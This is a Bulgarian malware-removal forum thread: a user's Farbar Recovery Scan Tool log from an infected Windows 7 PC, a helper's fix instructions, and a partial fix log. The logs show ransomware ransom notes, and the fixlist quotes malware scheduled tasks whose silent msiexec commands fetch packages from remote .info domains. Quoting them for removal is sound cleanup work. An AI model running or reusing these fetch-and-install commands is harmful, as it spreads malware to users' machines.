Премини към съдържанието

Препоръчан отговор


Здравейте и за много години,моят проблем хром бавно отваря забива и се срива- отварят се по няколко страници . В момента съм safe mode иначе забива

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 01-01-2019
Ran by ВЕС (administrator) on WIN-SKFJ6HLGST2 (03-01-2019 20:43:32)
Running from C:\Users\ВЕС\Downloads
Loaded Profiles: ВЕС (Available Profiles: ВЕС)
Platform: Microsoft Windows 7 Ultimate  Service Pack 1 (X86) Language: English (United States)
Internet Explorer Version 8 (Default browser: Chrome)
Boot Mode: Safe Mode (with Networking)
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-3512987231-521144983-709920193-1000\...\Run: [DHY0GM3ATCSFE7M] => "C:\Program Files\x0h1djdcnoe\3OQCH.exe"
HKU\S-1-5-21-3512987231-521144983-709920193-1000\...\Run: [Web Companion] => C:\Program Files\Lavasoft\Web Companion\Application\WebCompanion.exe --minimize 
HKU\S-1-5-21-3512987231-521144983-709920193-1000\...\MountPoints2: {41be252d-0f82-11e9-a624-002713343a56} - F:\Lenovo_Suite.exe
HKLM\...\Drivers32: [MSVideo8] => C:\Windows\system32\VfWWDM32.dll [56832 2010-11-20] (Microsoft Corporation)
HKLM\Software\Microsoft\Active Setup\Installed Components: [>{60B49E34-C7CC-11D0-8953-00A0C90347FF}] -> C:\Windows\System32\iedkcs32.dll [2010-11-20] (Microsoft Corporation)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files\Google\Chrome\Application\71.0.3578.98\Installer\chrmstp.exe [2019-01-03] (Google Inc.)
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{840DEA2A-8553-4D25-A5FB-7DB86C5BFBE5}: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{EE11610E-0BCC-42A7-A0AC-89B4A3B92BF1}: [DhcpNameServer] 192.168.0.1

Internet Explorer:
==================
HKU\S-1-5-21-3512987231-521144983-709920193-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/en-xl/?ocid=iehp
SearchScopes: HKU\S-1-5-21-3512987231-521144983-709920193-1000 -> {BDF61FAE-9D19-40F0-8F34-688DEB334CA9} URL = hxxp://securedsearch.lavasoft.com/results.php?pr=vmn&id=webcompa&ent=ch_WCYID10477_754_190103&q={searchTerms}
BHO: YoutubeAdBlock -> {984AFA40-4BEC-457F-AEDE-FE3404A646FA} -> C:\Program Files\VKkhWVSisIE\kwTiXoR.dll => No File

FireFox:
========
FF ProfilePath: C:\Users\ВЕС\AppData\Roaming\K-Meleon\oytl87x0.default [2019-01-03]
FF user.js: detected! => C:\Users\ВЕС\AppData\Roaming\K-Meleon\oytl87x0.default\user.js [2006-04-06]
FF Extension: (NewsFox) - C:\Users\ВЕС\Downloads\k-meleon\browser\extensions\{899DF1F8-2F43-4394-8315-37F6744E6319}.xpi [2016-01-04] [Legacy] [not signed]
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.33.23\npGoogleUpdate3.dll [No File]
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.33.23\npGoogleUpdate3.dll [No File]

Chrome: 
=======
CHR HomePage: Default -> hxxp://google.bg/
CHR Profile: C:\Users\ВЕС\AppData\Local\Google\Chrome\User Data\Default [2019-01-03]
CHR Extension: (Lightshot (скрииншот инструмент)) - C:\Users\ВЕС\AppData\Local\Google\Chrome\User Data\Default\Extensions\mbniclmhobmnbdlbpiphghaielnnpgdp [2019-01-03]
CHR Extension: (Плащания в уеб магазина на Chrome) - C:\Users\ВЕС\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-01-03]
CHR Extension: (Chrome Media Router) - C:\Users\ВЕС\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-01-03]

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

"qamplvkj" => service was unlocked. <==== ATTENTION

S3 GoogleChromeElevationService; C:\Program Files\Google\Chrome\Application\71.0.3578.98\elevation_service.exe [375776 2018-12-12] (Google Inc.)
R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [5073376 2018-09-19] (Malwarebytes)
S2 qamplvkj; C:\Windows\system32\qamplvkj\dfaricjc.exe [0 ] () <==== ATTENTION (zero byte File/Folder)
S2 gupdate; "C:\Program Files\Google\Update\GoogleUpdate.exe" /svc [X]
S3 gupdatem; "C:\Program Files\Google\Update\GoogleUpdate.exe" /medsvc [X]

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 MBAMChameleon; C:\Windows\System32\Drivers\MbamChameleon.sys [172280 2019-01-03] (Malwarebytes)
S3 MBAMFarflt; C:\Windows\System32\DRIVERS\farflt.sys [106144 2019-01-03] (Malwarebytes)
S3 MBAMProtection; C:\Windows\System32\DRIVERS\mbam.sys [63760 2019-01-03] (Malwarebytes)
R3 MBAMSwissArmy; C:\Windows\System32\Drivers\mbamswissarmy.sys [230120 2019-01-03] (Malwarebytes)
S3 MBAMWebProtection; C:\Windows\System32\DRIVERS\mwac.sys [83648 2019-01-03] (Malwarebytes)
U3 TrueSight; \??\C:\Windows\System32\drivers\truesight.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2019-01-04 03:15 - 2019-01-04 03:15 - 000001345 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Media Center.lnk
2019-01-04 03:15 - 2019-01-04 03:15 - 000001326 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows DVD Maker.lnk
2019-01-04 03:14 - 2019-01-04 03:14 - 000000000 ____H C:\Windows\system32\Drivers\Msft_User_WpdFs_01_09_00.Wdf
2019-01-04 03:10 - 2019-01-03 18:31 - 000000000 ____D C:\Windows\Panther
2019-01-04 03:03 - 2019-01-04 03:03 - 000000000 ____D C:\Windows.old
2019-01-03 20:43 - 2019-01-03 20:43 - 001783808 _____ (Farbar) C:\Users\ВЕС\Downloads\FRST.exe
2019-01-03 20:43 - 2019-01-03 20:43 - 000007564 _____ C:\Users\ВЕС\Downloads\FRST.txt
2019-01-03 20:43 - 2019-01-03 20:43 - 000000000 ____D C:\FRST
2019-01-03 20:18 - 2019-01-03 20:18 - 000106144 _____ (Malwarebytes) C:\Windows\system32\Drivers\farflt.sys
2019-01-03 20:18 - 2019-01-03 20:18 - 000083648 _____ (Malwarebytes) C:\Windows\system32\Drivers\mwac.sys
2019-01-03 20:18 - 2019-01-03 20:18 - 000063760 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys
2019-01-03 20:03 - 2019-01-03 20:03 - 000000000 ____D C:\Users\ВЕС\AppData\Local\mbam
2019-01-03 20:02 - 2019-01-03 20:42 - 000172280 _____ (Malwarebytes) C:\Windows\system32\Drivers\MbamChameleon.sys
2019-01-03 20:02 - 2019-01-03 20:02 - 000230120 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamswissarmy.sys
2019-01-03 20:02 - 2019-01-03 20:02 - 000002020 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2019-01-03 20:02 - 2019-01-03 20:02 - 000000000 ____D C:\Users\ВЕС\AppData\Local\mbamtray
2019-01-03 20:02 - 2019-01-03 20:02 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2019-01-03 20:02 - 2019-01-03 20:02 - 000000000 ____D C:\ProgramData\Malwarebytes
2019-01-03 20:02 - 2019-01-03 20:02 - 000000000 ____D C:\Program Files\Malwarebytes
2019-01-03 20:02 - 2018-12-04 08:09 - 000129248 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbae.sys
2019-01-03 20:00 - 2019-01-03 20:01 - 081227760 _____ (Malwarebytes ) C:\Users\ВЕС\Downloads\mb3-setup-consumer-3.6.1.2711-1.0.508-1.0.8211.exe
2019-01-03 19:40 - 2019-01-03 20:03 - 000000000 ____D C:\ProgramData\RogueKiller
2019-01-03 19:40 - 2019-01-03 19:40 - 029162424 _____ (Adlice Software ) C:\Users\ВЕС\Downloads\RogueKiller_setup.exe
2019-01-03 19:40 - 2019-01-03 19:40 - 000001001 _____ C:\Users\Public\Desktop\RogueKiller.lnk
2019-01-03 19:40 - 2019-01-03 19:40 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\RogueKiller
2019-01-03 19:40 - 2019-01-03 19:40 - 000000000 ____D C:\Program Files\RogueKiller
2019-01-03 19:34 - 2019-01-03 20:42 - 000265284 _____ C:\Windows\ntbtlog.txt
2019-01-03 19:30 - 2019-01-03 19:30 - 000000000 ____H C:\Windows\system32\Drivers\Msft_User_WpdMtpDr_01_09_00.Wdf
2019-01-03 19:10 - 2019-01-03 20:05 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\teiqv2gvtfm
2019-01-03 19:10 - 2019-01-03 20:05 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\imgn0qmwmwh
2019-01-03 19:10 - 2019-01-03 20:05 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\acysy1vaoki
2019-01-03 19:10 - 2019-01-03 19:10 - 006161408 _____ C:\Users\ВЕС\AppData\Local\dump007.dat
2019-01-03 19:09 - 2019-01-03 19:09 - 000000009 _____ C:\Users\ВЕС\rstr1.ini
2019-01-03 19:08 - 2019-01-03 20:05 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\3zxuksmazmq
2019-01-03 19:07 - 2019-01-03 19:07 - 000000258 __RSH C:\Users\ВЕС\ntuser.pol
2019-01-03 19:04 - 2019-01-03 19:04 - 000000000 ____D C:\Windows\system32\qamplvkj
2019-01-03 19:02 - 2019-01-03 20:05 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\vi5lm2mflim
2019-01-03 19:02 - 2019-01-03 20:05 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\sq0zlve2tqj
2019-01-03 19:02 - 2019-01-03 20:05 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\qc1oa2vrskn
2019-01-03 19:02 - 2019-01-03 19:02 - 000000000 ____D C:\Users\ВЕС\AppData\LocalLow\yHNPHHIzKpsCK
2019-01-03 19:01 - 2019-01-03 20:05 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\423viiu5lfu
2019-01-03 19:01 - 2019-01-03 20:05 - 000000000 ____D C:\Users\ВЕС\AppData\Local\Michael
2019-01-03 19:01 - 2019-01-03 19:19 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\ShopMore
2019-01-03 19:01 - 2019-01-03 19:07 - 000002964 __RSH C:\ProgramData\ntuser.pol
2019-01-03 19:01 - 2019-01-03 19:01 - 000493800 _____ (VideoDriver) C:\Windows\D04DE5140B2D.sys
2019-01-03 19:01 - 2019-01-03 19:01 - 000140800 _____ C:\Users\ВЕС\AppData\Local\installer.dat
2019-01-03 19:01 - 2019-01-03 19:01 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\Python
2019-01-03 19:00 - 2019-01-03 20:05 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\ezc3lfxnx4j
2019-01-03 19:00 - 2019-01-03 19:00 - 000000003 _____ C:\Users\ВЕС\AppData\Local\wbem.ini
2019-01-03 19:00 - 2019-01-03 19:00 - 000000000 ____D C:\ProgramData\{AC10FE2E-1A46-0496-3E07-15883EE04CD9}
2019-01-03 19:00 - 2019-01-03 19:00 - 000000000 ____D C:\ProgramData\{59403C6F-D807-F1C6-7FC5-457D7F221C2C}
2019-01-03 18:57 - 2019-01-03 18:57 - 000008906 _____ C:\Users\NYBMYXMIG-DECRYPT.txt
2019-01-03 18:57 - 2019-01-03 18:57 - 000008906 _____ C:\NYBMYXMIG-DECRYPT.txt
2019-01-03 18:57 - 2019-01-03 18:57 - 000000000 ____H C:\d85105b2d85102533b.lock
2019-01-03 18:56 - 2019-01-03 18:56 - 000000000 ____D C:\ProgramData\HCRGWPOIZH4OHCKX91M2
2019-01-03 18:56 - 2015-08-03 08:53 - 000384000 _____ (SafeIP) C:\Windows\system32\SafeIPs.dll
2019-01-03 18:55 - 2019-01-03 20:05 - 000000000 ____D C:\Program Files\KMSPico 10.2.1 Final
2019-01-03 18:53 - 2018-12-10 23:04 - 000499424 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2019-01-03 18:48 - 2019-01-03 18:48 - 001259736 _____ (Plarium) C:\Users\ВЕС\Downloads\PlariumPlaySetup (1).exe
2019-01-03 18:46 - 2019-01-03 18:46 - 000000000 ____D C:\Users\ВЕС\AppData\Local\Package Cache
2019-01-03 18:45 - 2019-01-03 19:03 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\Mozilla
2019-01-03 18:45 - 2019-01-03 18:45 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\K-Meleon
2019-01-03 18:45 - 2019-01-03 18:45 - 000000000 ____D C:\Users\ВЕС\AppData\Local\K-Meleon
2019-01-03 18:44 - 2019-01-03 18:44 - 000000000 ____D C:\Users\ВЕС\AppData\Local\Plarium
2019-01-03 18:44 - 2019-01-03 18:44 - 000000000 ____D C:\Users\ВЕС\AppData\Local\CEF
2019-01-03 18:39 - 2019-01-03 18:39 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\Google
2019-01-03 18:38 - 2019-01-03 19:53 - 000002202 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2019-01-03 18:38 - 2019-01-03 19:53 - 000002161 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2019-01-03 18:37 - 2019-01-03 19:02 - 000000000 ____D C:\Program Files\Google
2019-01-03 18:37 - 2019-01-03 19:00 - 000000000 ____D C:\Users\ВЕС\AppData\Local\Google
2019-01-03 18:37 - 2019-01-03 18:37 - 000057560 _____ C:\Users\ВЕС\AppData\Local\GDIPFONTCACHEV1.DAT
2019-01-03 18:37 - 2019-01-03 18:37 - 000000000 ____D C:\Users\ВЕС\AppData\Local\Deployment
2019-01-03 18:37 - 2019-01-03 18:37 - 000000000 ____D C:\Users\ВЕС\AppData\Local\Apps\2.0
2019-01-03 18:36 - 2014-05-14 17:23 - 001973728 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll
2019-01-03 18:36 - 2014-05-14 17:23 - 000054240 _____ (Microsoft Corporation) C:\Windows\system32\wuauclt.exe
2019-01-03 18:36 - 2014-05-14 17:23 - 000045536 _____ (Microsoft Corporation) C:\Windows\system32\wups2.dll
2019-01-03 18:36 - 2014-05-14 17:17 - 002425856 _____ (Microsoft Corporation) C:\Windows\system32\wucltux.dll
2019-01-03 18:36 - 2014-05-14 09:23 - 000179656 _____ (Microsoft Corporation) C:\Windows\system32\wuwebv.dll
2019-01-03 18:36 - 2014-05-14 09:17 - 000033792 _____ (Microsoft Corporation) C:\Windows\system32\wuapp.exe
2019-01-03 18:33 - 2019-01-03 19:53 - 000001335 _____ C:\Users\ВЕС\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2019-01-03 18:33 - 2019-01-03 19:09 - 000000000 ____D C:\Users\ВЕС
2019-01-03 18:33 - 2019-01-03 18:33 - 000000020 ___SH C:\Users\ВЕС\ntuser.ini
2019-01-03 18:33 - 2019-01-03 18:33 - 000000000 ____D C:\Users\ВЕС\AppData\Local\VirtualStore
2019-01-03 18:33 - 2010-11-21 01:46 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\Media Center Programs
2019-01-03 16:27 - 2019-01-03 16:27 - 000000000 ____D C:\My Drivers
2018-12-30 08:50 - 2018-12-30 08:50 - 005183296 _____ (Marcin Szeniak ) C:\Users\ВЕС\Downloads\BCUninstaller_4.12.1_setup.exe
2018-12-29 13:35 - 2018-12-29 13:35 - 000000000 ____D C:\SWSetup

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2019-01-04 03:15 - 2009-07-14 05:52 - 000000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2019-01-04 03:15 - 2009-07-14 03:37 - 000000000 ____D C:\Windows\system32\sysprep
2019-01-04 03:12 - 2010-11-21 01:46 - 000000000 ____D C:\Windows\CSC
2019-01-04 03:10 - 2009-07-14 05:52 - 000028672 _____ C:\Windows\system32\config\BCD-Template
2019-01-03 20:30 - 2010-11-20 22:01 - 000713888 _____ C:\Windows\system32\PerfStringBackup.INI
2019-01-03 20:30 - 2009-07-14 03:37 - 000000000 ____D C:\Windows\inf
2019-01-03 20:18 - 2009-07-14 05:53 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2019-01-03 20:17 - 2009-07-14 05:34 - 000016640 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2019-01-03 20:17 - 2009-07-14 05:34 - 000016640 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2019-01-03 19:01 - 2009-07-14 03:37 - 000000000 ____D C:\Windows\system32\GroupPolicy
2019-01-03 18:57 - 2018-08-11 19:54 - 000000000 ____D C:\Intel
2019-01-03 18:57 - 2017-10-21 13:53 - 000000000 ____D C:\LFS
2019-01-03 18:57 - 2017-09-25 20:50 - 000000000 ___RD C:\BECKO-PC
2019-01-03 18:57 - 2017-04-14 15:10 - 000036892 ____H C:\iCS Source.suo.nybmyxmig
2019-01-03 18:33 - 2009-07-14 05:33 - 000266808 _____ C:\Windows\system32\FNTCACHE.DAT
2019-01-03 18:31 - 2009-07-14 03:37 - 000000000 __RHD C:\Users\Public\Libraries
2019-01-03 17:30 - 2009-07-14 03:37 - 000000000 ____D C:\Windows\rescache
2019-01-03 15:34 - 2018-08-11 14:17 - 000000000 ____D C:\Users\ВЕС\Downloads\k-meleon
2019-01-01 13:09 - 2018-09-02 13:32 - 000000000 ____D C:\Users\ВЕС\Documents\TalkHelper

==================== Files in the root of some directories =======

1601-01-03 21:26 - 1601-01-03 21:26 - 000186368 ____N (Microsoft Corporation) C:\Users\ВЕС\AppData\Local\aIQEonJ.exe
2019-01-03 19:10 - 2019-01-03 19:10 - 006161408 _____ () C:\Users\ВЕС\AppData\Local\dump007.dat
2019-01-03 19:01 - 2019-01-03 19:01 - 000140800 _____ () C:\Users\ВЕС\AppData\Local\installer.dat
2019-01-03 19:00 - 2019-01-03 19:00 - 000000003 _____ () C:\Users\ВЕС\AppData\Local\wbem.ini

Some files in TEMP:
====================
2019-01-03 18:56 - 2019-01-03 18:56 - 000710464 _____ () C:\Users\ВЕС\AppData\Local\Temp\3.exe
2019-01-03 19:00 - 2019-01-03 19:00 - 001312696 _____ (                                                            ) C:\Users\ВЕС\AppData\Local\Temp\fastdatax.exe
2019-01-03 19:09 - 2019-01-03 20:19 - 000000000 ____D () C:\Users\ВЕС\AppData\Local\Temp\IEShims.dll
2019-01-03 19:00 - 2019-01-03 19:00 - 003520512 _____ () C:\Users\ВЕС\AppData\Local\Temp\installer_mi.exe
2019-01-03 18:56 - 2019-01-03 18:56 - 002715792 _____ (SafeIP, LLC.                                                ) C:\Users\ВЕС\AppData\Local\Temp\update.exe

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2019-01-04 03:11

==================== End of FRST.txt ===========================

Addition.txt

Screenshot.png

Сподели този отговор


Линк към този отговор
Сподели в други сайтове

Здравейте..! Системата ви е заразена..! Утре сутринта ще прегледам още веднъж дневниците и ще ви напиша скрипт и следващи инструкции..! Лека вечер..! :)

  • Харесва ми 3

Сподели този отговор


Линк към този отговор
Сподели в други сайтове

Благодаря, ще съм на разположение след 16:30

Сподели този отговор


Линк към този отговор
Сподели в други сайтове

Здравейте..За начало изпълнете следващия скрипт в Safe Mode..след изпълнението му опитайте да направите нови сканирания в нормален режим..!

 

Фикс с Farbar Recovery Scan Tool
 
icon13.gif Изтеглете прикачения файл
 fixlist.txt и го запазете там, където сте свалили FRST.exe
Стартирайте отново FRST.exe и натиснете бутона Fix веднъж и изчакайте.

Press%20the%20FIX%20button_zpsdd5zi3mt.p


Ще се създаде нов лог файла FixLog.txt. Прикачете съдържанието му в следващия си коментар.
 
ЗАБЕЛЕЖКА: Този скрипт е написан специално за този потребител,и за тази конкретна машина. Изпълнението на фикса, на друг компютър може да доведе до увреждане на  операционната ви система

 

pfNZP4A.png  Дневници
 
В следващия си отговор, моля да включите следните дневници:

  • FixLog.txt
  • Харесва ми 1

Сподели този отговор


Линк към този отговор
Сподели в други сайтове

Вече 1 час Fixing is in progress please wait 


Сподели този отговор


Линк към този отговор
Сподели в други сайтове

Нали в Safe Mode (with Networking) изпълняваш скрипта....?

 

Сподели този отговор


Линк към този отговор
Сподели в други сайтове

Да 

Въпреки  това сега виждам че имам лог файл

Fix result of Farbar Recovery Scan Tool (x86) Version: 01-01-2019
Ran by ВЕС (04-01-2019 16:30:36) Run:1
Running from C:\Users\ВЕС\Downloads
Loaded Profiles: ВЕС (Available Profiles: ВЕС)
Boot Mode: Safe Mode (with Networking)

==============================================

fixlist content:
*****************
start
CreateRestorePoint:
EmptyTemp:
CloseProcesses:
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-3512987231-521144983-709920193-1000\...\Run: [DHY0GM3ATCSFE7M] => "C:\Program Files\x0h1djdcnoe\3OQCH.exe"
HKU\S-1-5-21-3512987231-521144983-709920193-1000\...\Run: [Web Companion] => C:\Program Files\Lavasoft\Web Companion\Application\WebCompanion.exe --minimize
HKU\S-1-5-21-3512987231-521144983-709920193-1000\...\MountPoints2: {41be252d-0f82-11e9-a624-002713343a56} - F:\Lenovo_Suite.exe
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
SearchScopes: HKU\S-1-5-21-3512987231-521144983-709920193-1000 -> {BDF61FAE-9D19-40F0-8F34-688DEB334CA9} URL = hxxp://securedsearch.lavasoft.com/results.php?pr=vmn&id=webcompa&ent=ch_WCYID10477_754_190103&q={searchTerms}
BHO: YoutubeAdBlock -> {984AFA40-4BEC-457F-AEDE-FE3404A646FA} -> C:\Program Files\VKkhWVSisIE\kwTiXoR.dll => No File
"qamplvkj" => service was unlocked. <==== ATTENTION 
S2 qamplvkj; C:\Windows\system32\qamplvkj\dfaricjc.exe [0 ] () <==== ATTENTION (zero byte File/Folder)
2019-01-03 19:10 - 2019-01-03 20:05 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\teiqv2gvtfm
2019-01-03 19:10 - 2019-01-03 20:05 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\imgn0qmwmwh
2019-01-03 19:10 - 2019-01-03 20:05 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\acysy1vaoki
2019-01-03 19:08 - 2019-01-03 20:05 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\3zxuksmazmq
2019-01-03 19:04 - 2019-01-03 19:04 - 000000000 ____D C:\Windows\system32\qamplvkj
2019-01-03 19:02 - 2019-01-03 20:05 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\vi5lm2mflim
2019-01-03 19:02 - 2019-01-03 20:05 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\sq0zlve2tqj
2019-01-03 19:02 - 2019-01-03 20:05 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\qc1oa2vrskn
2019-01-03 19:02 - 2019-01-03 19:02 - 000000000 ____D C:\Users\ВЕС\AppData\LocalLow\yHNPHHIzKpsCK
2019-01-03 19:01 - 2019-01-03 20:05 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\423viiu5lfu
2019-01-03 18:57 - 2019-01-03 18:57 - 000008906 _____ C:\Users\NYBMYXMIG-DECRYPT.txt
2019-01-03 18:57 - 2019-01-03 18:57 - 000008906 _____ C:\NYBMYXMIG-DECRYPT.txt
2019-01-03 18:57 - 2019-01-03 18:57 - 000000000 ____H C:\d85105b2d85102533b.lock
2019-01-03 18:56 - 2019-01-03 18:56 - 000000000 ____D C:\ProgramData\HCRGWPOIZH4OHCKX91M2
C:\Windows\system32\qamplvkj\dfaricjc.exe
Task: {28388CE9-2CA7-49CC-9564-0F424E14BEED} - System32\Tasks\DvwLFWwXutwLxJgmB2 => rundll32 "C:\Program Files\ooxzIAzTqruiVIszQdR\yydPZjO.dll",#1
Task: {56D6A7AF-393C-40E2-9FC4-2A3636BD7188} - System32\Tasks\{EF961BFA-57B7-56F3-7C41-CBDA384B27B1} => "msiexec" -package hxxps://refreshnerer711.info/wVM4raQAo.n1e /q
Task: {7AF01070-CEDB-4440-A34C-665C65F672C1} - System32\Tasks\iYMvCriySoqaGgPjbmR2 => rundll32 "C:\Program Files\qUgzYKxVLnesC\lnFhOtc.dll",#1
Task: {8E82EE52-6E07-47A4-94E6-6615304E8C41} - System32\Tasks\{9691CC12-2E74-1BC2-86C6-CA40BD9675B3} => "msiexec" /q /i hxxps://refreshnerer711rb.info/F01BsF0RBXQ.CrC
Task: {97F429C1-49D9-4EE5-82B4-4FC29549D18B} - System32\Tasks\UXshqEpiPQcXH2 => C:\Windows\system32\wscript.exe "C:\ProgramData\BuHcEEPgNwocAWVB\QkkdFBc.wsf"
Task: {DB69F2CB-FE06-4A26-872B-C008C9CFD1BC} - System32\Tasks\mMzvDpxKxjJVUr => rundll32 "C:\Program Files\hUmbquBpttZU2\mNvKUiXnBbMki.dll",#1
AlternateDataStreams: C:\Windows\system32\config\systemprofile:.repos [6509722]
IE trusted site: HKU\S-1-5-21-3512987231-521144983-709920193-1000\...\webcompanion.com -> hxxp://webcompanion.com
reboot:
end

*****************

Error: Restore point can only be created in normal mode.
Processes closed successfully.
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender => removed successfully.
"HKU\S-1-5-21-3512987231-521144983-709920193-1000\Software\Microsoft\Windows\CurrentVersion\Run\\DHY0GM3ATCSFE7M" => removed successfully.
"HKU\S-1-5-21-3512987231-521144983-709920193-1000\Software\Microsoft\Windows\CurrentVersion\Run\\Web Companion" => removed successfully.
HKU\S-1-5-21-3512987231-521144983-709920193-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{41be252d-0f82-11e9-a624-002713343a56} => removed successfully.
HKLM\Software\Classes\CLSID\{41be252d-0f82-11e9-a624-002713343a56} => not found
HKLM\SOFTWARE\Policies\Google => removed successfully.
HKU\S-1-5-21-3512987231-521144983-709920193-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{BDF61FAE-9D19-40F0-8F34-688DEB334CA9} => removed successfully.
HKLM\Software\Classes\CLSID\{BDF61FAE-9D19-40F0-8F34-688DEB334CA9} => not found
